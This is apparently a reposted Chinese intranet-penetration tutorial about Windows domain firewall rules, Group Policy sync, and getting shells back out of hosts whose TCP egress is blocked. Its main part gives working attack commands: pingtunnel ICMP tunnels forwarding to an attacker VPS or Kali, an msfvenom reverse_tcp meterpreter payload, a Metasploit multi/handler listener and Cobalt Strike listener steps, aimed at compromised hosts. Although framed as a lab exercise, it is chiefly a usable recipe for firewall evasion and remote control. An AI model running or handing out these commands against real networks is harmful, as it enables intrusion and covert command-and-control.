【内网安全】 域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

这篇具有很好参考价值的文章主要介绍了【内网安全】 域防火墙&入站出站规则&不出网隧道上线&组策略对象同步。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


解决网络不通讯问题
代理与隧道技术:
代理:
流量转发至跳板机,可以是服务器或者肉鸡,最主要的特征是,无论代理后面挂了几个设备,代理对外只表现为一个设备。
隧道:
是通过特定的通讯方法,直接找到这个目标
reverse_tcp:反向 后门主动连接自己服务器 目标防火墙 出
bind_tcp:正向 自己服务器主动连接后门 目标防火墙 入

单机-防火墙-限制端口出入站

熟悉常见主机配置不出网的方式
1、入站&出站&连接安全
2、域&专用&公网&状态
3、阻止&允许&其他配置
对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器

单机-防火墙-限制协议出入站

熟悉常见主机配置不出网的方式
1、程序&端口&预定义&自定义
2、协议&TCP&UDP&ICMP&L2TP等
对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器
可以针对具体的协议进行出入站限制
有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。

域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程
操作:组策略管理-域-创建GPO链接-防火墙设置
更新策略:强制&命令&重启
命令:gpupdate/force

域成员强制同步DC域防火墙策略

域控-防火墙-组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)
ICMP协议项目:将TCP协议数据封装成ICMP协议数据 隧道技术

https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

这里我们实验是模拟DC禁用域成员主机TCP 4455端口出网:
对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器
实战中有两种方法进行上线:

  1. 隧道技术:后门走其他协议进行上线
  2. 流量转发:将数据转发给出网的机器 通过出网机器正向主动控制他

1、CS-ICMP-上线

VPS:
./pingtunnel -type server
肉鸡:(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 10.10.10.146 -t 10.10.10.146:7777 -tcp 1 -noprint 1 -nolog 1

CS:
监听器1:127.0.0.1 5555
监听器2:10.10.10.146 6666
生成监听器1的Stager后门肉鸡以监听器二上线执行

cs-TCP流量使用pingtunnel封装icmp流量上线

2、MSF上线

生成后门:

注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe

MSF启动监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit 

Kali开启隧道:

./pingtunnel -type server     需要在目标主机上执行 需要高权限

对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器

Win开启隧道 //将本地4455icmp协议数据转发至66ip的4444流量上(管理员运行)

pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1

对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器

流量是转了过来,但是不知道为什么没有生成会话。
对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器
3-13号,使用了本地kali复现成功了,真实vps没有复现成功

msf-TCP流量使用pingtunnel封装成icmp流量

注意:文章来源地址https://www.toymoban.com/news/detail-763220.html

  • 视频中msf-127-4455.exe是流量转发到本地127.0.0.1 4455端口
  • pingtunnel在webadmin靶机上需要高权限执行
  • 使用的kali ip:10.10.10.146 webadmin 出网ip:10.10.10.151
    对公司的邮件服务器建立防火墙规则 入站出战,# 内网渗透,安全,网络,服务器

到了这里,关于【内网安全】 域防火墙&入站出站规则&不出网隧道上线&组策略对象同步的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(48)
  • 第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线

    知识点 演示案例 总结

    2024年02月14日
    浏览(39)
  • 防火墙规则过期通知

    作为规则管理最佳实践,大多数安全管理员为其防火墙规则设置到期日期。过期后,需要更正防火墙规则才能再次激活。但是,由于大多数组织都有数百个规则和多个安全管理员处理这些规则,因此几乎不可能查看过期的规则并手动纠正它们。这就是为什么拥有一个可以自动

    2024年02月16日
    浏览(34)
  • Web应用防火墙--规则防护

    Web应用防火墙对网站、APP的业务流量安全及合规性保护,对业务流量的识别恶意特征提取、分析识别出恶意流量并进行处理, 将正常安全的流量回源到业务服务器, 保护网站核心业务和数据安全。 京东云Web应用防火墙的产品架构示意图如下: Web攻击常见的三种检测手段,规

    2024年02月09日
    浏览(40)
  • Linux----防火墙之保存规则

    之前写的iptables的设置,但是都是临时生效的,一旦电脑重启,那么就会失效,如何永久保存,需要借助iptables-save命令,开机生效需要借助iptables-restore命令,并写入规定的配置文件中。 ...... 让防火墙规则在开机后自动运行 方法一: 方法二: 开机自动加载规则 第一种:个性

    2024年02月20日
    浏览(30)
  • 防火墙规则顺序解决方案

    防火墙是保护网络免受攻击的第一道防线,防火墙对互联网和公司IT网络之间的流量拥有绝对控制权,防火墙规则的配置处理调节流量的关键任务。 这些规则会仔细检查传入和传出流量,并根据规则中提到的条件允许或阻止它,防火墙规则越严格,网络就越强大,安全管理团

    2024年02月07日
    浏览(48)
  • 思科ASA防火墙:内网telnet远程控制防火墙 && 外网ssh远程控制防火墙

    现在他们相互都可以通信 全局通信 1.内网telnet连接ASA 进入asa防火墙全局模式 telnet 192.168.1.1 255.255.255.0 in telnet + 指定远程ip + 子网掩码 +接口名称in=e0/1 如果想让全部都可以连接 telnet 0.0.0.0 0.0.0.0 in passwd 123  设置连接密码 pass + 自定义密码     2.外网ssh远程连接asa防火墙 进入

    2023年04月11日
    浏览(50)
  • Linux实战——Tomcat安装部署、Linux中配置JDK环境、关闭防火墙、配置防火墙规则

    Tomcat安装部署【简单】 简介 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等。 简单来说,Tomcat是一个WEB应用程序的托管平台,可以让用户编写的WEB应用程序,被

    2023年04月09日
    浏览(49)
  • Windows通过命令开启、关闭、删除防火墙规则

    #关闭端口 #开启端口 #删除规则 参考: https://blog.51fuli.info/windows%e9%98%b2%e7%81%ab%e5%a2%99-netsh-advfirewall-%e8%ae%be%e7%bd%ae/

    2024年02月16日
    浏览(53)
  • docker上面部署nginx-waf 防火墙“modsecurity”,使用CRS规则,搭建WEB应用防火墙

    web防火墙(waf)免费开源的比较少,并且真正可以商用的WAF少之又少,modsecurity 是开源防火墙鼻祖并且有正规公司在维护着,目前是https://www.trustwave.com在维护,不幸的是2024 年 7 月将不再维护交还开源社区管理,Trustwave目前打造自己的web防火墙,至于是否免费开源就不得而知

    2023年04月21日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包